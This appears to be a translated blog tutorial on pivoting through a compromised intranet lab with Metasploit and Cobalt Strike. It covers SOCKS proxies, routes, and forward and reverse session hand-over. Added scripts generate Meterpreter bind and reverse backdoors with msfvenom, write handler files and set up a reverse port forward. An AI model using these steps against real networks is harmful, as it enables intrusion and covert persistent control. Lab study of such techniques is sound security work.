Intranet Security: Detailed Explanation of Proxy Technology

Table of contents

Network topology used in the proxy experiments

Proxy technology

The SOCKS protocol

Reasons to use proxy technology

Forward and reverse connections

Lab 1: MSF proxy communication

How it works

1. Meterpreter adds a route

2. MSF starts a SOCKS server

3. Point a proxy at MSF

Lab 2: CS proxy communication

How it works

1. CS starts a SOCKS proxy

2. Set the proxy in Proxifier

Lab 3: CS forward connection check-in

How it works

1. Configure a listener so that the win10 Beacon listens on its own port 2222

2. Run the CS connect command

Lab 4: MSF forward connection check-in

How it works

1. Generate a bind payload listening on the target's own port

2. MSF connects actively

About reverse connections

Summary


This article introduces the proxy techniques commonly used in intranet attack and defence, together with forward and reverse connections.

Intranet attack and defence has three stages:

1. Establish communication: use a proxy to connect the attack machine to the target network

2. Lateral movement

3. Post-exploitation: once a host has been compromised, use a tunnel to hand its session back to the attack machine

In every experiment below the hosts have already been compromised with SYSTEM privileges; lateral movement is out of scope, and only stages 1 and 3 are studied.

Network topology used in the proxy experiments

Network segments: VMware virtual networks

Attack machine: 47.94.236.117

Targets:

        Win 7: the only intranet host with outbound internet access; it can also reach the hosts on 192.168.11.0/24

                192.168.1.119 (external egress)    192.168.11.128 (intranet, VMnet2)

        Win 10: intranet host, no outbound internet access

                192.168.11.129 (intranet, VMnet2)    192.168.22.130 (intranet, VMnet3)

        Win 2008: intranet host, no outbound internet access

                192.168.22.131 (intranet, VMnet3)    192.168.33.129 (intranet, VMnet4)

        Win 2012: intranet host, no outbound internet access

                192.168.33.130 (intranet, VMnet4)

Proxy technology

Proxy technology here means the SOCKS4/SOCKS5 protocol.

Commonly used proxy clients include SocksCap, Proxifier and ProxyChains.

Their use is demonstrated in the experiments below.

The SOCKS protocol

SOCKS is a proxy protocol: a client asks a SOCKS server to open a connection to a destination on its behalf, and the server then relays bytes in both directions. It runs over TCP and is used to put an intermediary between a client program and a server.

Two versions are in use, SOCKS4 and SOCKS5:

  1. SOCKS4:

    • SOCKS was originally written by David Koblas; the SOCKS4 specification comes from Ying-Da Lee. SOCKS4a later added destination host names.
    • It is a simple protocol: IPv4 addresses only, and no authentication (the request carries a USERID string, but the server has no way to verify it).
    • The client sends a CONNECT request naming the destination IP address and port.
    • The server connects to the destination and, once that connection is up, relays the data stream for the client.
  2. SOCKS5:

    • Defined in RFC 1928, with username/password authentication in RFC 1929 and GSSAPI authentication in RFC 1961.
    • It extends SOCKS4 with more functions and features.
    • It supports IPv4, IPv6 and domain-name destinations, several authentication methods (none, username/password, GSSAPI), and UDP relay in addition to TCP.
    • The client first negotiates an authentication method, then sends a CONNECT request naming the destination host name or IP address and port.
    • The server connects to the requested destination and relays the data stream for the client.

SOCKS is mainly used to implement network proxies: it establishes an intermediate channel between the local machine and a remote server through which requests are forwarded. This matters in scenarios such as reaching hosts behind a firewall or hiding the real source IP address.

Where does SOCKS sit in the OSI model? It is not a transport protocol (it rides on TCP) and it is application-agnostic (it carries HTTP, SMB, RDP or anything else unchanged), so it is conventionally placed at the session layer (layer 5), between the transport and application layers. It is implemented in user space, not in the operating system's network stack: on the server side by the proxy program (here MSF or Cobalt Strike), and on the client side either by applications that speak SOCKS natively or by "proxifier" tools such as Proxifier, SocksCap and ProxyChains, which intercept a program's socket calls and redirect them to the SOCKS server.
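The two request formats above, built by hand as hex so the difference between the versions (and why a client and server must agree on one) is visible at byte level. This is an added example, not code from the original article; the IP address and ports come from the article's topology, and the host name dc01 is made up for illustration.

```bash
#!/usr/bin/env bash
# Added example: hand-built SOCKS4 and SOCKS5 CONNECT requests as hex.
# Pure shell + od; only socks5_probe opens a network connection, and it is
# never called unless you call it yourself.

# 16-bit big-endian port -> 4 hex digits
hex16() { printf '%04x' "$1"; }

# dotted-quad IPv4 -> 8 hex digits
hexip4() {
  local IFS=.
  set -- $1
  printf '%02x%02x%02x%02x' "$1" "$2" "$3" "$4"
}

# raw string -> hex (empty string -> empty output)
hexstr() { printf '%s' "$1" | od -An -tx1 | tr -d ' \n'; }

# SOCKS4 CONNECT: VN=0x04 CD=0x01 DSTPORT(2) DSTIP(4) USERID NUL
# IPv4 only; USERID is not authentication, the server just reads it.
socks4_connect() {  # $1=ipv4 $2=port [$3=userid]
  printf '0401%s%s%s00' "$(hex16 "$2")" "$(hexip4 "$1")" "$(hexstr "${3:-}")"
}

# SOCKS5 greeting: VER=0x05 NMETHODS METHODS...
# method 0x00 = no auth, 0x02 = username/password (RFC 1929)
socks5_greeting() {  # [$1=userpass]
  if [ "${1:-}" = userpass ]; then printf '05020002'; else printf '050100'; fi
}

# SOCKS5 CONNECT: VER=0x05 CMD=0x01 RSV=0x00 ATYP ADDR DSTPORT(2)
# ATYP 0x01 = IPv4, 0x03 = domain name (the server resolves it; this is
# what ProxyChains' proxy_dns relies on)
socks5_connect() {  # $1=ipv4 or hostname $2=port
  local atyp addr
  case $1 in
    *[!0-9.]*) atyp=03; addr=$(printf '%02x' "${#1}")$(hexstr "$1") ;;
    *)         atyp=01; addr=$(hexip4 "$1") ;;
  esac
  printf '050100%s%s%s' "$atyp" "$addr" "$(hex16 "$2")"
}

# Send greeting + CONNECT to a SOCKS5 server and dump the reply bytes.
# Expected: 05 00 (method accepted) then 05 00 00 ... (connected);
# 05 05 = target refused, 05 02 = ruleset forbids. A SOCKS4-only server
# answers with garbage or closes, which is the version mismatch in action.
socks5_probe() {  # $1=proxy host $2=proxy port $3=target $4=target port
  local hex="$(socks5_greeting)$(socks5_connect "$3" "$4")"
  exec 3<>"/dev/tcp/$1/$2"
  printf "$(printf '%s' "$hex" | sed 's/../\\x&/g')" >&3
  timeout 5 head -c 12 <&3 | od -An -tx1
  exec 3>&-
}
```

Feed the hex to a proxy port with your tool of choice, or call socks5_probe against the SOCKS server started in the labs below; the first reply byte pair tells you immediately whether the server speaks the version you sent.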

Reasons to use proxy technology

In practice, proxying means that traffic is relayed through a pivot host (the compromised machine).

The reasons are illustrated with the topology above.

Reason 1: establish communication between the attack machine and intranet hosts

Ubuntu is our attack machine, and win7, the internet-facing host, was compromised through web penetration testing. Ubuntu still cannot attack win10, because it has no route to it.

Reason 2: avoid detection, stay hidden, and still reach the objective

Ubuntu carries a large set of penetration testing tools. One might think of uploading those tools to win7 and attacking win10 from there, and then the other intranet hosts in turn. This works from a network point of view, but it is extremely risky. A real environment may have security appliances, traffic inspection devices and anti-virus software; uploading gigabytes of tooling is far too noisy and easily spotted. As a rule of thumb, keep what you upload to around 500 KB and not more than about 1 MB.

Reason 3: persistent control

After taking further hosts through lateral movement, we need to bring their sessions back to the attack machine to keep persistent control, because the tools and software needed to maintain access are integrated there.

Forward and reverse connections

When we connect the target to the attack machine we usually have to decide whether the connection is forward or reverse.

In a real intranet the operations staff typically configure host firewalls: some hosts allow only port 80, some block TCP entirely. They restrict inbound and outbound rules according to each host's role and state. Inbound rules are usually strict and outbound rules usually looser.

Forward and reverse are defined from the target's point of view:

  • Forward connection: the proxy (attack) machine actively connects to the target
  • Reverse connection: the target actively connects to the proxy (attack) machine

Which one to use is chosen according to the firewall rules.

In an intranet engagement both assume the proxy channel is already in place.

Forward connection: the target listens on a port of its own and the attack machine connects in; this suits loose inbound rules.

Reverse connection: the target connects out to a port on the attack machine; this suits strict inbound and loose outbound rules.

Lab 1: MSF proxy communication

Starting point: win7 has been compromised as SYSTEM and already has a session in MSF.

Goal: establish communication and take win10.

How it works

Adding a route means MSF itself can reach the 192.168.11.0/24 segment through the win7 session.

Starting a SOCKS server gives other tools an entry point: it accepts proxied traffic and forwards it over that route.

Win7 and MSF can be thought of as one machine; the traffic appears to come from win7.

1. Meterpreter adds a route

Add a route for 192.168.11.0/24 through the win7 session (with the msfconsole route command or the Meterpreter autoroute module; screenshot in the original).

MSF can now talk to 192.168.11.0/24.

This route exists only inside MSF, however: other tools on the same server do not see it. Only traffic sent through Meterpreter uses it.

2. MSF starts a SOCKS server

Use the SOCKS proxy server module (auxiliary/server/socks_proxy) to start a SOCKS listener inside MSF; other traffic connects to it and is handed to the route.

A username and password are optional.

The port is opened on the MSF server.

Any host can now point a SOCKS proxy at MSF and have its traffic forwarded into 192.168.11.0/24.

3. Point a proxy at MSF

Configure a proxy on an external host whose proxy address is the MSF server; that host's traffic is then forwarded to MSF.

Set the proxy (screenshot in the original).

The SOCKS version must match: a client speaking SOCKS5 to a server started as SOCKS4a (or the other way round) fails at the handshake.

A proxy can be applied to an individual program (an EXE), and that program's traffic is forwarded.

The intranet host is reached successfully.

Communication between attack machine A and the intranet host is established.

The penetration testing tools on attack machine A can now be run against the intranet.
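The three steps above as a script, so the route, the SOCKS server and the client side can be reproduced without the screenshots. This is an added example, not the article's own code. It assumes win7 is Meterpreter session 1, MSF runs on the attack machine 47.94.236.117, the SOCKS server goes on port 1080, and the client tool on attack machine A is proxychains-ng (proxychains4) driving nmap; it also goes slightly beyond the text by showing which nmap options are needed for a scan through a SOCKS pivot.

```bash
#!/usr/bin/env bash
# Added example: Lab 1 scripted. Writes an msfconsole resource file and a
# proxychains config, then scans through the pivot. Assumptions: session 1
# is win7, SOCKS on 1080, proxychains-ng as the client. msfconsole and
# proxychains4 are only touched when the script is invoked with "run".
set -u

ATTACKER=${ATTACKER:-47.94.236.117}
SOCKS_PORT=${SOCKS_PORT:-1080}

# Steps 1 and 2: route the subnet through the session, then start the SOCKS
# server that hands proxied connections to that route. "run -j" keeps the
# server in the background so the console stays usable.
msf_pivot_rc() {  # $1=session id $2=network $3=netmask $4=socks port
  cat <<EOF
route add $2 $3 $1
route print
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT $4
set VERSION 5
run -j
EOF
}

# Step 3: proxychains config for tools on attack machine A. The "socks5"
# here must match VERSION above; a SOCKS4a client fails the handshake
# against a SOCKS5-only server and vice versa.
proxychains_conf() {  # $1=proxy host $2=proxy port
  cat <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 $1 $2
EOF
}

run_pivot() {
  msf_pivot_rc 1 192.168.11.0 255.255.255.0 "$SOCKS_PORT" > pivot.rc
  proxychains_conf "$ATTACKER" "$SOCKS_PORT" > pivot.conf
  # The route needs the existing session, so load the file in the console
  # that owns it instead of starting a fresh msfconsole.
  echo 'In the console that holds session 1 run:  resource pivot.rc'
  # Only TCP connects are tunnelled: no ICMP ping (-Pn), no raw SYN (-sT),
  # no local DNS (-n). UDP and ICMP never reach the intranet this way.
  proxychains4 -q -f pivot.conf nmap -sT -Pn -n -p 445,3389 192.168.11.129
}

if [ "${1:-}" = run ]; then run_pivot; fi
```

The route/SOCKS pair is also why only TCP tools work through this pivot: Meterpreter relays TCP connects, so a ping sweep or a SYN scan pushed through proxychains returns nothing useful.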

Lab 2: CS proxy communication

Starting point: win7 has been compromised as SYSTEM and already has a Beacon in CS.

Goal: establish communication and take win10.

How it works

CS and win7 can be thought of as one machine; the traffic appears to leave from win7.

1. CS starts a SOCKS proxy

This single step (the Beacon socks command, which opens a SOCKS port on the team server: SOCKS4a by default, SOCKS5 in newer versions) does what the route and the SOCKS server together do in MSF. Pick the matching version when you configure the client.

2. Set the proxy in Proxifier

Connected.

Configure the proxy rules:

The traffic of the selected applications goes through the proxy.

Traffic to the selected destination IPs goes through the proxy.

Communication succeeded!

Lab 3: CS forward connection check-in

Purpose: with a forward connection, hand win10's session to CS for persistent control.

CS can also use a reverse connection, just as MSF can; the labs only show the forward case.

How it works

This suits loose inbound rules.

Win10 runs a Beacon that listens on one of its own ports.

Win7 connects forward to that port on win10, which is equivalent to CS connecting forward to win10.

1. Configure a listener so that the win10 Beacon listens on its own port 2222

The listener named 1 is the reverse-connection listener already used for win7.

The listener named 2 is the forward-connection listener: a Beacon TCP listener bound to port 2222.

Generate a payload from listener 2 and run it on win10 (yes, this is cheating: the lab only shows the hand-over of the session and assumes lateral movement is already done).

2. Run the CS connect command

Forward check-in:

The connection goes through win7, so the command is run in win7's Beacon session:

connect 192.168.11.129 2222

(192.168.11.129 is win10's VMnet2 address from the topology; the win7 Beacon connects to it and the new Beacon is chained through win7.)

Online!

Lab 4: MSF forward connection check-in

Purpose: with a forward connection, hand win10's session to MSF for persistent control.

MSF can also use a reverse connection, just as CS can; again only the forward case is shown.

How it works

This suits loose inbound rules on win10 (a reverse connection is the choice when inbound is strict and outbound is loose).

Win10 listens on one of its own ports. MSF connects to that port through the route over the win7 session, so win10 sees the connection coming from win7; the session ends up in MSF.

1. Generate a bind payload listening on the target's own port

Generate a backdoor with a bind_tcp payload (msfvenom) and run it on win10; it listens on the chosen port (screenshot in the original).

2. MSF connects actively

Start a handler with the same bind_tcp payload, win10 as RHOST and the chosen port. Because the route from Lab 1 is in place, the handler reaches win10 through win7 and the session comes in (screenshot in the original).

About reverse connections

Only forward connections were carried out in these labs, because the reverse case is more involved. The point of a reverse connection is to get past inbound rules by having the target connect out. For that goal there is actually a better approach: tunnelling (preview of the next post!).

The reverse-connection idea, taking win10 to win7 as the example:

  1. Generate a backdoor that connects back to win7 at 192.168.11.128:4444
  2. Reverse port forward 4444 on win7 to local port 5555 on the MSF host
  3. Listen on 5555 and wait for win10 to call in

It is too cumbersome; using a tunnel directly is better.
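The forward (bind) payload and handler from Lab 4, and the three reverse steps just listed, written out as msfvenom commands and msfconsole resource files. This is an added example, not the article's own code. It assumes the article's topology (win7 = 192.168.11.128 as session 1 with the 192.168.11.0/24 route already added, win10 = 192.168.11.129), bind port 2222, the reverse chain win10 to win7:4444 to MSF:5555, and x64 Meterpreter payloads; the -R/-p/-l/-L flags for the reverse port forward are from current Meterpreter documentation and are worth checking with portfwd -h on your build.

```bash
#!/usr/bin/env bash
# Added example: forward (bind) and reverse check-in through the win7 pivot.
# Assumptions: win7 = session 1 with the route in place, win10 = .129,
# x64 payloads. Nothing runs unless invoked with "forward" or "reverse";
# even then the script only prints the msfvenom line and writes the .rc file.
set -u

WIN7=192.168.11.128
WIN10=192.168.11.129

# Forward: the payload listens on win10 (needs inbound 2222 open on win10);
# MSF connects to it through the route, so win10 sees win7 as the peer.
bind_payload_cmd() {  # $1=port $2=output file
  printf 'msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=%s -f exe -o %s\n' "$1" "$2"
}

bind_handler_rc() {  # $1=target ip $2=port
  cat <<EOF
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/bind_tcp
set RHOST $1
set LPORT $2
run
EOF
}

# Reverse: the payload on win10 connects out to win7:4444 (only outbound
# needed on win10). A reverse port forward on the win7 session makes win7
# listen on 4444 and relay to 127.0.0.1:5555 on the MSF host, where a
# reverse_tcp handler waits. "sessions -C" runs the Meterpreter command on
# session 1 without dropping into it, so the rest of the file keeps going.
reverse_payload_cmd() {  # $1=pivot ip $2=pivot port $3=output file
  printf 'msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=%s LPORT=%s -f exe -o %s\n' "$1" "$2" "$3"
}

reverse_handler_rc() {  # $1=session id $2=pivot port $3=local port
  cat <<EOF
sessions -C "portfwd add -R -p $2 -l $3 -L 127.0.0.1" -i $1
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT $3
run
EOF
}

case ${1:-} in
  forward)
    bind_payload_cmd 2222 bind2222.exe          # run this, copy the exe to win10, start it
    bind_handler_rc "$WIN10" 2222 > forward.rc  # then: msf6 > resource forward.rc
    ;;
  reverse)
    reverse_payload_cmd "$WIN7" 4444 rev4444.exe
    reverse_handler_rc 1 4444 5555 > reverse.rc # load this BEFORE starting rev4444.exe
    ;;
esac
```

Order matters in the reverse case: the port forward and the handler must be up before the payload runs on win10, otherwise its connection to win7:4444 is refused and the stager exits. In the forward case the order is the opposite: the bind payload must already be listening when the handler connects.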

See the next article, Intranet Security: A Preliminary Exploration of Tunnel Technology.

My blog also has a post on ICMP tunnelling, which you can refer to.

Summary

Proxy technology:

Background: a host on the intranet (IP 192.168.x.*) has been compromised and has a session in MSF/CS.

MSF proxy setup:

  1. Use the Meterpreter session on 192.168.x.* to add a route; MSF is then effectively inside that segment
  2. Start the SOCKS server, which accepts proxied traffic and forwards it over the route
  3. Attack machine A (external, with the tooling) points its proxy at MSF

CS proxy setup: trivially easy

  1. Start a SOCKS proxy on the 192.168.x.* session
  2. Configure the proxy client on attack machine A

The main value of establishing communication: the attack machine can talk to hosts on the intranet, and only then is lateral movement possible.

Forward and reverse connections:

  • Choose according to the firewall rules on the spot
  • Both assume the proxy channel is already in place
  • Forward connection: the target listens on a port of its own and the attack machine connects in; suits loose inbound rules
  • Reverse connection: the target connects out to a port on the attack machine; suits strict inbound and loose outbound rules


Source: blog.csdn.net/qq_61553520/article/details/131021667